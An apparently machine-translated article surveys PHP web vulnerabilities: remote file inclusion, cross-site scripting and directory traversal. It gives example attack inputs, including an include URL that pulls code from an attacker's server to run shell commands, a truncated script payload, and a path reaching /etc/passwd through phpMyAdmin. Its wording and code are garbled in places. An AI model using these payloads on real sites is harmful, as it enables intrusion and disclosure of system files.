Summary of Vulnerabilities in PHP scripting sites

The script looks at the current network security, the most attention and contact with the most Web page vulnerability should be ASP, in this respect, small bamboo is an expert, I have no say. However, in PHP, there are also serious security issues, but there are not many articles. Here, Let's talk a little bit about the vulnerabilities of PHP pages.

I have done a summary of the current common PHP vulnerabilities, roughly divided into the following: Include file vulnerabilities, script command execution vulnerabilities, file leaks, SQL injection vulnerabilities and so on. Of course, some of the generic techniques, such as cookie spoofing, are not discussed here, and there is a lot of information on the web. Let's just one to analyze how to exploit these vulnerabilities!

First, let's discuss the inclusion file vulnerability. This vulnerability should be said to be PHP unique. This is due to inadequate processing of externally provided malicious data, which can allow remote attackers to exploit these vulnerabilities to execute arbitrary commands on the system with Web process privileges. Let's take a look at an example: Suppose there is such a code in the a.php:
Include ($include.) /xxx.php ");
?>
In this code, $include is generally a set of paths, but we can build a path by ourselves to achieve the purpose of the attack. Let's say we submit: a.php?include=http://web/b.php, this web is the space we use to attack, Of course, b.php is the code we use to attack. We can write code similar to: PassThru ("/bin/ls/etc") in b.php, so that we can perform some purposeful attacks. (Note: The Web server should not be able to execute PHP code, or there will be a problem.) to see how << attacks Common vulnerabilities in PHP programs >>. In this loophole, a lot of things, such as: PayPal Store Front,
Hotnews,mambo Open source,phpdig,yabb Se,phpbb,invisionboard,solmetra spaw editor,les Visiteurs,PhpGedView, X-cart wait a few.

Next, let's take a look at the script command execution vulnerability. This is due to the lack of adequate filtering of the URI parameters submitted to the user, and the submission of data containing malicious HTML code can lead to a cross-site scripting attack and potentially sensitive information for the target user. Let us also cite an example: in php php transparent php 4.3.1 The following version of the index.php page for the phpsessid lack of adequate filtering, we can use this code to achieve the purpose of the attack:
Http://web/index.php? Phpsessid= "> in script we can construct a function to get some sensitive information about the user. There is a little less of this vulnerability, in addition to the PHP transparent: php-nuke,phpbb,php classifieds, Phpix,ultimate PHP board and so on.

And then we'll look at the file leak. This vulnerability is due to a lack of adequate filtering of user submission parameters that remote attackers can use to perform directory traversal attacks and to obtain sensitive information. Let's take the recently discovered phpMyAdmin as an example. In phpMyAdmin, the export.php page does not adequately filter the user-submitted ' What ' parameters, and the remote attacker submits a multiple '. /' character, you can bypass the Web root limit and view arbitrary file information on the system with Web permissions. For example, to enter such an address: export.php?what=. /.. /.. /.. /.. /.. /etc/passwd